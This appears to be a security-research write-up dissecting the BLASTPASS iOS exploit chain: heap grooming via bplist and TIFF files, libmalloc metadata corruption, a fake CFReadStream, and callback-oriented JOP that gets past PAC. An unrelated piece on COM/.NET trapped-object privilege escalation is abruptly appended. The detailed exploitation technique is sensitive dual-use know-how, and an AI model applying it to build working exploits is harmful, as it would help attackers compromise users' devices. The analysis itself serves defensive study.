Parsing the single 5.5MB bplist causes nearly half a million allocations, churning through nearly a gigabyte of memory. Just looking through this allocation summary it's clear there's lots of CFString and CFData objects, likely used for heap shaping. Looking further down the list there are other interesting numbers:
The 20'000 in the last line is far too round a number to be a coincidence. This number matches up with the number of __NSDictionaryM objects allocated:
Finally, at the very bottom of the list there are two more allocation patterns which stand out:
There are two sets of very large allocations: eighty 1MB allocations and forty-four 4MB ones.
I modified my bplist tool again to dump out each unique string or data buffer, along with a count of how many times it was seen and its hash. Looking through the file listing there's a clear pattern:
Object Size   Count
-----------   ------
0x3FFFFF      44
0xFFFFF       80
0x3FFF        20
0x26A9        24978
0x2554        44
0x23FF        5822
0x22A9        4
0x1FFF        2
0x1EA9        26
0x1D54        40
0x17FF        66
0x13FF        66
0x3FF         322
0x3D7         404
0xF           112882
0x8           3
There are a large number of allocations which fall just below a "round" number in hexadecimal: 0x3ff, 0x13ff, 0x17ff, 0x1fff, 0x23ff, 0x3fff... That heavily hints that they are sized to fall exactly within certain allocator size buckets.
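That hint is easy to check: the sizes called out above all sit exactly one byte below a multiple of the small rack's 0x200-byte block size, so adding a single byte of overhead lands the request exactly on a block boundary (the exact per-allocation overhead is an assumption here; the bucket arithmetic is what matters):

```python
# Each "just below round" size is one byte short of a 0x200 multiple.
sizes = [0x3FF, 0x13FF, 0x17FF, 0x1FFF, 0x23FF, 0x3FFF]
for s in sizes:
    assert (s + 1) % 0x200 == 0, hex(s)

# The two giant groom sizes behave the same way at megabyte granularity:
assert 0xFFFFF + 1 == 1 << 20    # 1MB
assert 0x3FFFFF + 1 == 1 << 22   # 4MB
```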
Almost all of the allocations are just filled with zeros or 'A's. But the 1MB one is quite different:
Further on in the hexdump of the 1MB object there's clearly an NSExpression payload - this payload is also visible by just running strings on the WebP file. Matthias Frielingsdorf from iVerify gave a talk at BlackHat Asia with an initial analysis of this NSExpression payload; we'll return to that at the end of this blog post.
Equally striking (and visible in the hexdump above): there are clearly pointers in there. It's too early in the analysis to know whether this is a payload which gets rebased somehow, or whether there's a separate ASLR disclosure step.
On a slightly higher level this hexdump looks a little bit like an Objective-C or C++ object, though some things are strange. Why are the first 24 bytes all zero? Why isn't there an isa pointer or vtable? It looks a bit like there are a number of integer fields before the pointers, but what are they? At this stage of the analysis, I had no idea.
Thinking dynamically
I had tried a lot to reproduce the exploit primitives on a real device; I built tooling to dynamically generate and sign legitimate PKPass files that I could send via iMessage to test devices and I could crash a lot, but I never seemed to get very far into the exploit - the iOS version range where the heap grooming works seems to be pretty small, and I didn't have an exact device and iOS version match to test on.
Regardless of what I tried (sending the original exploits via iMessage, sending custom PKPasses with the trigger and groom, rendering the WebP directly in a test app, or using the PassKit APIs to render the PKPass file), the best I could manage dynamically was to trigger a heap metadata integrity check failure, which I assumed was indicative of the exploit failing.
(Amusingly, using the legitimate APIs to render the PKPass inside an app failed with an error that the PKPass file was malformed. And indeed, the exploit sample PKPass is malformed: it's missing multiple required files. But the "secure" PKPass BlastDoor parser entrypoint (PKPassSecurePreviewContextCreateMessagesPreview) is, in this regard at least, less strict and will attempt to render an incomplete and invalid PKPass).
Though getting the whole PKPass parsed was proving tricky, with a bit of reversing it was possible to call the correct underlying CoreGraphics APIs to render the WebP and also get the EXIF/MakerNote parsed. By then setting a breakpoint when the huffman tables were allocated I had hoped it would be obvious what the overflow target was. But it was actually totally unclear what the following object was: (Here X3 points to the start of the huffman tables which are 0x3000 bytes large)
The first qword (0x111800000) is a valid pointer, but this is clearly not an Objective-C object, nor did it seem to look like any other recognizable object or have much to do with either the bplist or WebP. But running the tests a few times, there was a curious pattern:
The huffman table is 0x2F28 bytes, which the allocator rounds up to 0x3000. And in both of those test runs, adding the allocation size to the huffman table pointer yielded a suspiciously round number. There's no way that's a coincidence. Running a few more tests, the table+0x3000 pointer was always 8MB aligned. I remembered from some presentations I'd read on the iOS userspace allocator, including one from Synacktiv, that 8MB is a meaningful number.
8MB is the size of the iOS userspace default allocator's small rack regions. It looks like they might be trying to groom the allocator to target not application-specific data, but allocator metadata. Time to dive into some libmalloc internals!
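Before diving in, the alignment observation can be captured as a simple predicate; the example pointers below are hypothetical, chosen only to match the observed pattern:

```python
SMALL_REGION_SIZE = 8 << 20  # 8MB small region

def table_ends_on_region_boundary(table_ptr: int, rounded_size: int = 0x3000) -> bool:
    # True when the rounded-up huffman table allocation ends exactly
    # at an 8MB-aligned address, i.e. at the end of a small region.
    return (table_ptr + rounded_size) % SMALL_REGION_SIZE == 0

assert table_ends_on_region_boundary(0x147FFD000)       # ends at 0x148000000
assert not table_ends_on_region_boundary(0x147FFD100)
```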
libmalloc
I'd suggest reading the two presentations linked above for a good overview of the iOS default userspace malloc implementation. Libmalloc manages memory on four levels of abstraction. From largest to smallest those are: rack, magazine, region and block. The size split between the tiny, small and large racks depends on the platform. Almost all the relevant allocations for this exploit come from the small rack, so that's the one I'll focus on.
Reading through the libmalloc source I noticed that the region trailer, whilst still called a trailer, has now been moved to the start of the region object. The small region manages memory in chunks of 8MB. That 8MB gets split up into (for our purposes) three relevant parts: a header, an array of metadata words, then blocks of 512 bytes which form the allocations:
The first 0x28 bytes are a header where the first two fields form a linked-list of small regions:
typedef struct region_trailer {
    struct region_trailer *prev;
    struct region_trailer *next;
    unsigned bytes_used;
    unsigned objects_in_use;
    mag_index_t mag_index;
    volatile int32_t pinned_to_depot;
    bool recirc_suitable;
    rack_dispose_flags_t dispose_flags;
} region_trailer_t;
The small region manages memory in units of 512 bytes called blocks. On iOS allocations from the small region consist of contiguous runs of up to 31 blocks. Each block has an associated 16-bit metadata word called a small meta word, which itself is subdivided into a "free" flag in the most-significant bit, and a 15-bit count.
To mark a contiguous run of blocks as in-use (belonging to an allocation) the first meta word has its free flags cleared and the count set to the number of blocks in the run. On free, an allocation is first placed on a lookaside list for rapid reuse without freeing. But once an allocation really gets freed the allocator will attempt to greedily coalesce neighbouring chunks. While in-use runs can never exceed 31 blocks, free runs can grow to encompass the entire region.
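A small model of that meta word encoding (a sketch based on the description above), including the two values that matter for this exploit: 0x0003, an in-use three-block run, and 0x8027, the corrupted word we'll meet shortly:

```python
FREE_FLAG = 0x8000   # most-significant bit of the 16-bit meta word
BLOCK     = 0x200    # small-rack block size: 512 bytes

def decode_meta(word: int):
    return {"free": bool(word & FREE_FLAG),
            "blocks": word & 0x7FFF,
            "bytes": (word & 0x7FFF) * BLOCK}

# An in-use three-block run (the CFSet backing buffer seen later):
assert decode_meta(0x0003) == {"free": False, "blocks": 3, "bytes": 1536}

# The corrupted word: a 39-block run, well past the 31-block in-use limit.
assert decode_meta(0x8027) == {"free": True, "blocks": 39, "bytes": 19968}
```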
The groom
Below you can see the state of the meta words array for the small region directly following the one containing the huffman table as its last allocation:
With some simple maths we can convert indexes in the meta words array into their corresponding heap pointers. Doing that it's possible to dump the memory associated with the allocations shown above. The larger 0x19, 0x18 and 0x1c allocations all seem to be generic groom allocations, but the two 0x3 block allocations appear more interesting. The first one (with the first metadata word at 0x14800005a, shown in yellow) is the code_lengths array which gets freed directly after the huffman table building fails. The blue 0x3 block run (with the first metadata word at 0x148000090) is the backing buffer for a CFSet object from the MakerNote and contains object pointers.
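Here's that simple maths as a sketch. The 0x28-byte header size comes from the region_trailer struct above; the offset at which the 0x200-byte blocks begin within the region is an assumption for illustration:

```python
REGION_BASE   = 0x148000000  # 8MB-aligned region base, from the dump above
HEADER_SIZE   = 0x28         # region trailer at the start of the region
BLOCKS_OFFSET = 0x8000       # assumed offset of the blocks area (illustrative)
BLOCK         = 0x200

def meta_index(meta_word_addr: int) -> int:
    # One 16-bit meta word per block, starting right after the header.
    return (meta_word_addr - REGION_BASE - HEADER_SIZE) // 2

def block_ptr(meta_word_addr: int) -> int:
    return REGION_BASE + BLOCKS_OFFSET + meta_index(meta_word_addr) * BLOCK

# The yellow (code_lengths) and blue (CFSet backing buffer) runs:
yellow = block_ptr(0x14800005A)
blue   = block_ptr(0x148000090)
assert meta_index(0x14800005A) == 25
assert blue - yellow == 27 * BLOCK   # the runs are 27 blocks apart
```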
Recall that the corruption primitive will write the dword 0x270007 at 0x58 bytes off the end of the 0x3000 allocation (and that allocation happens to sit directly in front of this small region). That corruption has the following effect (shown in bold):
It's changed the size of an in-use allocation from 3 blocks to 39 (or from 1536 to 19968 bytes). I mentioned before that the maximum size of an in-use allocation is meant to be 31 blocks, but this doesn't seem to be checked in every single free path. If things don't quite work out, you'll hit a runtime check. But if things do work out you end up with a situation like this:
The yellow (0x8027) allocation now extends beyond its original three blocks and completely overlaps the following green (0x18) and blue (0x3) as well as the start of the purple (0x1c) allocation.
But as soon as this corruption occurs WebP parsing fails and it's not going to make any other allocations. So what are they doing? How are they able to leverage these overlapping allocations? I was pretty stumped.
One theory was that perhaps it was some internal ImageIO or BlastDoor specific object which reallocated the overlapping memory. Another theory was that perhaps the exploit had two parts; this first part which puts overlapping entries on the allocator freelist, then another file which is sent to exploit that? And maybe I was lacking that file? But then, why would there be that huge 1MB payload with NSExpressions in it? That didn't add up.
Puzzling pieces
As is so often the case, stepping back and not thinking about the problem for a while I realised that I'd completely overlooked and forgotten something critical. Right at the very start of the analysis I had run file on all the files inside the PKPass and noted that background.png was actually not a png but a TIFF. I had then completely forgotten that. But now the solution seemed obvious: the reason to use a PKPass versus just a WebP is that the PKPass parser will render multiple images in sequence, and there must be something in the TIFF which reallocates the overlapping allocation with something useful.
Libtiff comes with a suite of tools for parsing tiff files. tiffdump displays the headers and EXIF tags:
This dumps the uncompressed TIFF strip buffer and this looks much more interesting! There's clearly some structure, though not a lot of it. Is this really enough to do something useful? It looks like there could be some sort of object, but I didn't recognise the structure, and had no idea how replacing an object with this would be useful. I explored two possibilities:
1) Alpha blending:
This is actually the raw TIFF strip after decompression but before the rendering step which applies the alpha, so it was possible that this got rendered "on top" of another object. That seemed like a reasonable explanation for why the object seemed so sparse; perhaps the idea was to just "move" a pointer value. The first 16 bytes of the strip look like this:
00 00 00 00 00 00 00 00 84 13 00 00 01 00 00 00
which when viewed as two 64-bit values look like this:
0x0000000000000000 0x0000000100001384
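That reinterpretation is just two little-endian 64-bit reads:

```python
import struct

# The first 16 bytes of the strip buffer, as shown above.
strip_start = bytes.fromhex("00000000000000008413000001000000")
lo, hi = struct.unpack("<QQ", strip_start)
assert (lo, hi) == (0x0, 0x0000000100001384)
```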
It seemed sort-of plausible that rendering the 0x100001384 on top of another pointer might be a neat primitive, but there was something that didn't quite add up. This pointer-ish value is at the start of the strip buffer, so if the overlapping allocation got reallocated with this strip buffer directly, nothing interesting would happen, as the overlapping parts are further along. Maybe the overlapping buffer gets split up multiple times, but this was seeming less and less likely, and I couldn't reproduce this part of the exploit to actually observe what happened.
2) This is an object:
The other theory I had was that this actually was an object. The 8 zero bytes at the start were certainly strange… so then what's the significance of the next 8 bytes?
84 13 00 00 01 00 00 00
I tried using lldb's memory find command to see if there were other instances of that exact byte sequence occurring in a test iOS app rendering the WebP then the TIFF using the CoreGraphics APIs:
They're not identical, but it seemed a strange coincidence.
I took a bunch of test app core dumps using lldb's process save-core command and wrote some simple code to search for similar-ish byte patterns. After some experimentation I managed to find something:
It's an NSCFArray, which is the Foundation (Objective-C) "toll-free bridged" version of the Core Foundation (C) CFArray type! This was the hint that I was looking for to identify the significance of the TIFF and that 1MB groom object, which also contains a similar byte sequence.
Cores and Foundations
Even though Apple hasn't updated the open-source version of CoreFoundation for almost a decade, the old source is still helpful. Here's what a CoreFoundation object looks like:
So the header is an Objective-C isa pointer followed by four bytes of _cfinfo, followed by a reference count. Taking a closer look at the uses of _cfinfo:
It seems that the second byte in _cfinfo is a type identifier. And indeed, running expr (int) CFArrayGetTypeID() in lldb prints 19 (0x13), which matches up with both the object found in the coredump and the strange (or now not so strange) object in the TIFF strip buffer.
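The check against the fake object's header can be written out directly. Per the CFRuntimeBase layout above: an 8-byte isa pointer, four bytes of _cfinfo (with the type ID in the second byte), then the reference count:

```python
# First 16 bytes of the fake object in the TIFF strip buffer.
header = bytes.fromhex("00000000000000008413000001000000")

isa     = int.from_bytes(header[0:8], "little")
type_id = header[9]                               # second byte of _cfinfo
refcnt  = int.from_bytes(header[12:16], "little")

assert isa == 0         # CF objects can have a NULL isa pointer
assert type_id == 19    # CFArrayGetTypeID() == 19 == 0x13
assert refcnt == 1
```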
X steps forwards, Y steps back
Looking through more of the CoreFoundation code it seems that the object in the TIFF strip buffer is a CFArray with inline storage containing one element with the value 0x1234abcd. It also seems that it's possible for CF objects to have NULL isa pointers, which explains why the first 8 bytes of the fake object are zero.
This is interesting, but it still doesn't actually get us any closer to figuring out what the next step of the exploit actually is. If the CFArray is meant to overlap with something, then what? And what interesting side-effects could having a CFArray with only a single element with the value 0x1234abcd possibly have?
This seems like one step forward and two steps back, but there's something else which we can now figure out: what that 1MB groom object actually is. Let's take a look at the start of it again:
It looks like another CF object, starting at +0x10 in the buffer with the same NULL isa pointer, a reference count of 1 and a _cfinfo of {0x80, 0x26, 0, 0}. The type identifiers aren't actually fixed; they're allocated dynamically via calls to _CFRuntimeRegisterClass like this:
The CFTypeIDs are really just indexes into the __CFRuntimeClassTable array, and even though the types are allocated dynamically the ordering seems sufficiently stable that the hardcoded type values in the exploit work. 0x26 is the CFTypeID for CFReadStream:
struct _CFStream {
    CFRuntimeBase _cfBase;
    CFOptionFlags flags;
    CFErrorRef error;
    struct _CFStreamClient *client;
    void *info;
    const struct _CFStreamCallBacks *callBacks;
    CFLock_t streamLock;
    CFArrayRef previousRunloopsAndModes;
    dispatch_queue_t queue;
};
Looking through the CFStream code it seems to call various callback functions during object destruction — that seems like a very likely path towards code execution, though with some significant caveats:
Caveat I: It's still unclear how an overlapping allocation in the small malloc region could lead to a CFRelease being called on this 1MB allocation.
Caveat II: What about ASLR? There have been some tricks in the past targeting "universal gadgets" which work across multiple slides. Nemo also had a neat objective-c trick for defeating ASLR in the past, so it's plausible that there's something like that here.
Caveat III: What about PAC? If it's a data-only attack then maybe PAC isn't an issue, but if they are trying to JOP they'd need a trick beyond just an ASLR leak, as all forward control flow edges should be protected by PAC.
Special Delivery
Around this time in my analysis Matthias Frielingsdorf offered me the use of an iPhone running 16.6, the same version as the targeted ITW victim. With Matthias' vulnerable iPhone, I was able to use the Dopamine jailbreak to attach lldb to MessagesBlastDoorService and after a few tries was able to reproduce the exploit right up to the CFRelease call on the fake CFReadStream, confirming that that part of my analysis was correct!
Collecting a few crashes led, yet again, to even more questions...
Caveat I: Mysterious Pointers
Similar to the analysis of the huffman tables, there was a clear pattern in the fake object pointers, which this time were even stranger than the huffman tables. The crash site was here:
LDR X8, [X19, #0x30]
LDR X8, [X8, #0x58]
At this point X19 points to the fake CFReadStream object, and collecting a few X19 values there's a pretty clear pattern:
0x000000075f000010
0x0000000d4f000010
The fake object is inside a 1MB heap allocation, but all those fake object addresses are always 16 bytes above a 16MB-aligned address. It seemed really strange to me to end up with a pointer 0x10 bytes past such a round number. What kind of construct would lead to the creation of such a pointer? Even though I did have a debugger attached to MessagesBlastDoorService, it wasn't a time-travel debugger, so figuring out the history of such a pointer was non-trivial. Using the same core dump analysis techniques I could see that the pointer which would end up in X19 was also present in the backing buffer of the CFSet described earlier. But how did it get there?
Having found the strange CFArray inside the TIFF I was heavily biased towards believing that this must have something to do with it, so I wrote some tooling to modify the fake CFArrays in the TIFF in the exploit. The theory was that by messing with that CFArray, I could cause a crash when it was used and figure out what was going on. But making minor changes to the strip buffer didn't seem to have any effect — the exploit still worked! Even replacing the entire strip buffer with A's didn't stop the exploit working... What's going on?
Stepping back
I had made a list of the primitives I thought might lead to the creation of such a strange looking pointer — first on the list was a partial pointer overwrite. But then why the CFArray? But now having shown that the CFArray can't be involved, it was time to go back to the list. And step back even further and make sure I'd really looked at all of that TIFF...
There were still those four other metadata buffers in the tiffdump output I'd shown earlier:
I'd just dismissed them, but maybe I shouldn't have. I had actually already dumped the full contents of each of those buffers and checked that there wasn't something else apart from the zeros. They were all zeros, except for the third-to-last byte of each, which was 0x10, something I'd considered completely uninteresting. Uninteresting, unless you wanted to partially overwrite the three least-significant bytes of a little-endian pointer value with 0x000010, that is!
Each of those four metadata buffers in the TIFF is 15347 bytes, which is 0x3bf3 — looked at another way that's 0x3c00 (the size rounded up to the next 0x200 block size), minus 5, minus 8.
0x3c00 is exactly 30 0x200 byte blocks. Each 16-bit word in the metadata array shown above corresponds to one 0x200 block, where the overlapping chunk in yellow starts at 0x14800005a. Counting forwards 30 chunks means that the end of a 0x3c00 allocation overlaps perfectly with the end of the original blue three-chunk allocation:
This has the effect of overwriting all but the last 16 bytes of the blue allocation with zeros, then overwriting the three least-significant bytes of the second-to-last pointer-sized value with 0x10 00 00; which, if that memory happened to contain a pointer, has the effect of "shifting" that pointer down to the nearest 16MB boundary, then adding 0x10 bytes! (For those who saw my 2024 Offensivecon talk, this was the missing link between the overlapping allocations and code execution I mentioned.)
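Putting numbers on that: the buffer size maths and the effect of the three-byte overwrite (the original pointer value below is hypothetical; the result matches the pattern of the observed X19 values):

```python
# 15347-byte buffers round up to exactly 30 blocks:
assert 15347 == 0x3BF3 == 0x3C00 - 5 - 8
assert 0x3C00 == 30 * 0x200

def overwrite_low3(ptr: int) -> int:
    # Overwrite the three least-significant bytes of a little-endian
    # pointer with 10 00 00, i.e. replace them with the value 0x000010.
    return (ptr & ~0xFFFFFF) | 0x10

target = 0x000000075F2C3D48         # hypothetical pointer in the CFSet buffer
faked  = overwrite_low3(target)

assert faked == 0x000000075F000010  # nearest 16MB boundary below, plus 0x10
assert faked % (16 << 20) == 0x10
```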
As mentioned earlier, that blue allocation starting with 0x0003 is the backing buffer of a CFSet object from the bplist inside the WebP MakerNote. The set is constructed in a very precise fashion such that the target pointer (the one to be rounded down) ends up as the second-to-last pointer in the backing buffer. The 1MB object is then also groomed such that it falls on a 16MB boundary below the object which the CFSet entry originally points to. Then when that CFSet is destructed it calls CFRelease on each object, causing the fake CFReadStream destructor to run.
Caveat II: ASLR
We've looked at the whole flow from huffman table overflow to CFRelease being invoked on a fake CFReadStream — but there's still stuff missing. The second open question I discussed earlier was ASLR. I had theorised that maybe it used a trick like a universal gadget, but is that the case?
In addition to the samples, I was also able to obtain a number of crash logs from failed exploit attempts where those samples were thrown, which meant I could figure out the ASLR slide of the MessagesBlastDoorService when the exploit failed. In combination with the target device and exact OS build (also contained in the crash log) I could then obtain the matching dyld_shared_cache, subtract the runtime ASLR slide from a bunch of the pointer-looking things in the 1MB object and take a look at them.
The simple answer is: the 1MB object contains a large number of hardcoded, pre-slid, valid pointers. There's no weird machine, tricks or universal gadget here. By the time the PKPass is built and sent by the attackers they already know both the target device type and build as well as the runtime ASLR slide of the MessagesBlastDoorService...
In the years since PAC was introduced we've seen a whole spectrum of interesting ways to either defeat, or just avoid, PAC. So what did these attackers do? To understand that let's follow the CFReadStream destruction code closely. (All these code snippets are from the most recently available version of CF from 2015, but the code doesn't seem to have changed much.)
Here's the definition of the CFReadStream:
static const CFRuntimeClass __CFReadStreamClass = {
    0,
    "CFReadStream",
    NULL,                       // init
    NULL,                       // copy
    __CFStreamDeallocate,
    NULL,
    NULL,
    NULL,                       // copyHumanDesc
    __CFStreamCopyDescription
};
When a CFReadStream is passed to CFRelease, it will call __CFStreamDeallocate:
static void __CFStreamDeallocate(CFTypeRef cf) {
    struct _CFStream *stream = (struct _CFStream *)cf;
    const struct _CFStreamCallBacks *cb =
        _CFStreamGetCallBackPtr(stream);
    CFAllocatorRef alloc = CFGetAllocator(stream);
    _CFStreamClose(stream);
_CFStreamGetCallBackPtr just returns the CFStream's callBacks field:
That gives a status code of 0x1f with all the other flag bits clear. This gets through the two conditional branches to reach this close callback call:
At this point we need to switch to looking at the assembly to see what's really happening:
__CFStreamClose
var_30 = -0x30
var_20 = -0x20
var_10 = -0x10
var_s0 =  0
PACIBSP
STP     X24, X23, [SP, #-0x10+var_30]!
STP     X22, X21, [SP, #0x30+var_20]
STP     X20, X19, [SP, #0x30+var_10]
STP     X29, X30, [SP, #0x30+var_s0]
ADD     X29, SP, #0x30
MOV     X19, X0
BL      __CFStreamGetStatus
CBZ     X0, loc_187076958
The fake CFReadStream is the first argument to this function, so passed in the X0 register. It's then stored into X19 so it survives the call to __CFStreamGetStatus.
Skipping ahead past the flag checks we reach the callback callsite (this is also the crash site seen earlier):
LDR     X8, [X19, #0x30]
...
LDR     X8, [X8, #0x58]
CBZ     X8, loc_187076758
LDR     X1, [X19, #0x28]
MOV     X0, X19
BLRAAZ  X8
Let's walk through each instruction in turn there:
First it loads the 64-bit value from X19+0x30 into X8:
LDR     X8, [X19, #0x30]
Looking at the hexdump of the 1MB object above this will load the value 0x25846ec20.
From the crash reports we know the runtime ASLR slide of the MessagesBlastDoorService when this exploit was thrown was 0x3A8D0000, so subtracting that we can figure out where in the shared cache this pointer should point:
0x25846ec20 - 0x3A8D0000 = 0x21DB9EC20
It points into the __const segment of the TextToSpeechMauiSupport library in the shared cache:
The next instruction adds 0x58 to that TextToSpeechMauiSupport pointer and reads a 64-bit value from there:
LDR     X8, [X8, #0x58]    // X8 := [0x21DB9EC20 + 0x58]
This loads the pointer to the function _DataSectionWriter_CommitDataBlock from 0x21DB9EC78.
IDA is simplifying something for us here: the function pointer loaded there is actually signed with the A-family instruction key with a zero context. This signing happens transparently (either during load or when the page is faulted in).
The remaining four instructions then check that the pointer wasn't NULL, load X1 from offset +0x28 in the fake 1MB object, move the pointer to the fake object back into X0 and call the PAC'ed _DataSectionWriter_CommitDataBlock function pointer via BLRAAZ:
CBZ     X8, loc_187076758
LDR     X1, [X19, #0x28]
MOV     X0, X19
BLRAAZ  X8
Callback-Oriented Programming
A well-known attack against PAC is to swap two valid, PAC'ed pointers which are signed in the same way but point to different places (e.g. swapping two function pointers with different semantics, allowing you to exploit those semantic differences).
Since a large number of PAC-protected pointers are signed with the A-family instruction key with a zero-context value, there are a large number of pointers to choose from. "Just" having an ASLR defeat shouldn't be enough to achieve this though; surely you'd need to disclose the actual PAC'ed pointer value? But that's not what happened above.
Notice that the CFStream objects don't directly contain the callback function pointers — there's an extra level of indirection. The CFStream object contains a pointer to a callback structure, and that structure has the PAC'd function pointers. And crucially: that first pointer, the one to the callbacks structure, isn't protected by PAC. This means that the attackers can freely swap pointers to callback structures, operating one-level removed from the function pointers.
This might seem like a severe constraint, but the dyld_shared_cache is vast and there are easily enough pre-existing callback structures to build a "callback-oriented JOP" chain, chaining together unsigned pointers to signed function pointers.
The initial portion of the payload is a large callback-oriented JOP chain which is used to bootstrap the evaluation of the next payload stage, a large NSExpression.
Similarities
There are a number of similarities between this exploit chain and PWNYOURHOME, an earlier exploit also attributed by Citizen Lab to NSO, described in this blog post in April 2023.
That chain also had an initial stage targeting HomeKit, followed by a stage targeting MessagesBlastDoorService and also involving a MakerNote object — the Citizen Lab post claims that at the time the MakerNote was inside a PNG file. My guess would be that that PNG was being used as the delivery mechanism for the MakerNote bplist heap grooming primitives discussed in this post.
Based on Citizen Lab's description it also seems like PWNYOURHOME was leveraging a similar callback-oriented JOP technique, and it seems likely that there was also a HomeKit-based ASLR disclosure. The PWNYOURHOME post has a couple of extra details around a minor fix which Apple made, preventing parsing of "certain HomeKit messages unless they arrive from a plausible source." But there still aren't enough details to figure out the underlying vulnerability or primitive. It seems likely to me that the same issue, or a variant thereof was still in use in BLASTPASS.
Key material
Matthias from iVerify presented an initial analysis of the NSExpression payload at BlackHat Asia in April 2024. In early July 2024, Matthias and I took a closer look at the final stages of the NSExpression payload which decrypts an AES-encrypted NSExpression and executes it.
It seems very likely that the encrypted payload contains a BlastDoor sandbox escape. Although the BlastDoor sandbox profile is fairly restrictive it still allows access to a number of system services like notifyd, logd and mobilegestalt. In addition to the syscall attack surface there's also a non-trivial IOKit driver attack surface:
In FORCEDENTRY the sandbox escape was contained directly in the NSExpression payload (though that was an escape from the less-restrictive IMTranscoderAgent sandbox). This time around it seems extra care has been taken to prevent analysis of the sandbox escape.
The question is: where does the key come from? We had a few theories:
Perhaps the key is just obfuscated, and by completely reversing the NSExpression payload we can find it?
Perhaps the key is derived from some target-specific information?
Perhaps the key was somehow delivered in some other way and can be read from inside BlastDoor?
We spent a day analysing the NSExpression payload and concluded that the third theory appeared to be the correct one. The NSExpression walks up the native stack looking for the communication ports back to imagent. It then hijacks that communication, effectively taking over responsibility for parsing all subsequent incoming requests from imagent for "defusing" of iMessage payloads. The NSExpression loops 100 times, parsing incoming requests as XPC messages, reading the request XPC dictionary and then the data XPC data object to get access to the raw, binary iMessage format. It waits until the device receives another iMessage with a specific format, and from that message extracts an AES key which is then used to decrypt the next NSExpression stage and evaluate it.
We were unable to recover any messages with the matching format and therefore unable to analyse the next stage of the exploit.
Conclusion
In contrast to FORCEDENTRY, BLASTPASS's separation of the ASLR disclosure and RCE phases obviated the need for a novel weird machine. Whilst the heap groom was impressively complicated and precise, the exploit still relied on well-known exploitation techniques. Furthermore, the MakerNote bplist groom and callback-JOP PAC defeat techniques appear to have been in use for multiple years, based on similarities with Citizen Lab's blogpost in 2023, which looked at devices compromised in 2022.
Enforcing much stricter requirements on the format of the bplist inside the MakerNote (for example: a size limit or a strict-parser mode which rejects duplicate keys) would seem prudent. The callback-JOP issue is likely harder to mitigate.
The HomeKit aspect of the exploit chain remains mostly a mystery, but it seems very likely that it was somehow involved in the ASLR disclosure. Samuel Groß's 2021 post "A Look at iMessage in iOS 14" mentioned that Apple added support for re-randomizing the shared cache slide of certain services. Ensuring that BlastDoor has a unique ASLR slide could be a way to mitigate this.
This is the second in-the-wild NSO exploit which relied on simply renaming a file extension to access a parser in an unexpected context which shouldn't have been allowed.
FORCEDENTRY had a .gif which was really a .pdf.
BLASTPASS had a .png which was really a .webp.
A basic principle of sandboxing is treating all incoming attacker-controlled data as untrusted, and not simply trusting a file extension.
This speaks to a broader challenge in sandboxing: that current approaches based on process isolation can only take you so far. They increase the length of an exploit chain, but don't necessarily reduce the size of the initial remote attack surface. Accurately mapping, then truly reducing the scope of that initial remote attack surface should be a top priority.
Object-orientated remoting technologies such as DCOM and .NET Remoting make it very easy to develop an object-orientated interface to a service which can cross process and security boundaries. This is because they're designed to support a wide range of objects, not just those implemented in the service, but any other object compatible with being remoted. For example, if you wanted to expose an XML document across the client-server boundary, you could use a pre-existing COM or .NET library and return that object back to the client. By default, when the object is returned it's marshaled by reference, which results in the object staying in the out-of-process server.
This flexibility has a number of downsides, one of which is the topic of this blog: the trapped object bug class. Not all objects which can be remoted are necessarily safe to expose this way. For example, the previously mentioned XML libraries, in both COM and .NET, support executing arbitrary script code in the context of an XSLT document. If an XML document object is made accessible over the boundary, then the client could execute code in the context of the server process, which can result in privilege escalation or remote-code execution.
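To make the XSLT danger concrete, a script-bearing stylesheet for the MSXML engine looks roughly like this (the msxsl namespace and implements-prefix mechanism are the standard ones; the JScript body is a hypothetical payload). If a trapped XML document object in a privileged process can be made to run a transform with such a stylesheet, the script executes in that process:

```xml
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://example.com/ns">
  <!-- JScript embedded in the stylesheet runs in whichever process
       performs the transform, i.e. the server hosting the object. -->
  <msxsl:script language="JScript" implements-prefix="user">
    function run() {
      new ActiveXObject("WScript.Shell").Run("calc.exe");
      return "";
    }
  </msxsl:script>
  <xsl:template match="/">
    <xsl:value-of select="user:run()"/>
  </xsl:template>
</xsl:stylesheet>
```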
There are a number of scenarios that can introduce this bug class. The most common is where an unsafe object is shared inadvertently. An example of this was CVE-2019-0555. This bug was introduced because when developing the Windows Runtime libraries an XML document object was needed. The developers decided to add some code to the existing XML DOM Document v6 COM object which exposed the runtime specific interfaces. As these runtime interfaces didn't support the XSLT scripting feature, the assumption was this was safe to expose across privilege boundaries. Unfortunately a malicious client could query for the old IXMLDOMDocument interface which was still accessible and use it to run an XSLT script and escape a sandbox.
Another scenario is where there exists an asynchronous marshaling primitive. This is where an object can be marshaled both by value and by reference, and the platform chooses by-reference as the default mechanism. For example, the FileInfo and DirectoryInfo .NET classes are both serializable, so they can be sent to a .NET remoting service marshaled by value. But they also derive from the MarshalByRefObject class, which means they can be marshaled by reference. An attacker can leverage this by sending the server a serialized form of the object which, when deserialized, will create a new instance of the object in the server's process. If the attacker can read back the created object, the runtime will marshal it back to the attacker by reference, leaving the object trapped in the server process. Finally, the attacker can call methods on the object, such as creating new files, which will execute with the privileges of the server. This attack is implemented in my ExploitRemotingService tool.
The final scenario I'll mention, as it has the most relevance to this blog post, is abusing the built-in mechanisms the remoting technology uses to look up and instantiate objects in order to create an unexpected object. For example, in COM if you can find a code path to call the CoCreateInstance API with an arbitrary CLSID and get that object passed back to the client then you can use it to run arbitrary code in the context of the server. An example of this form is CVE-2017-0211, which was a bug which exposed a Structured Storage object across a security boundary. The storage object supports the IPropertyBag interface, which can be used to create an arbitrary COM object in the context of the server and get it returned to the client. This could be exploited by getting an XML DOM Document object created in the server, returned to the client marshaled by reference, and then using the XSLT scripting feature to run arbitrary code in the context of the server to elevate privileges.
Where Does IDispatch Fit In?
The IDispatch interface is part of the OLE Automation feature, which was one of the original use cases for COM. It allows for late binding of a COM client to a server, so that the object can be consumed from scripting languages such as VBA and JScript. The interface is fully supported across process and privilege boundaries, although it's more commonly used for in-process components such as ActiveX.
To facilitate calling a COM object at runtime the server must expose some type information to the client so that it knows how to package up parameters to send via the interface's Invoke method. The type information is stored in a developer-defined Type Library file on disk, and the library can be queried by the client using the IDispatch interface's GetTypeInfo method. As the COM implementation of the type library interface is marshaled by reference, the returned ITypeInfo interface is trapped in the server and any methods called upon it will execute in the server's context.
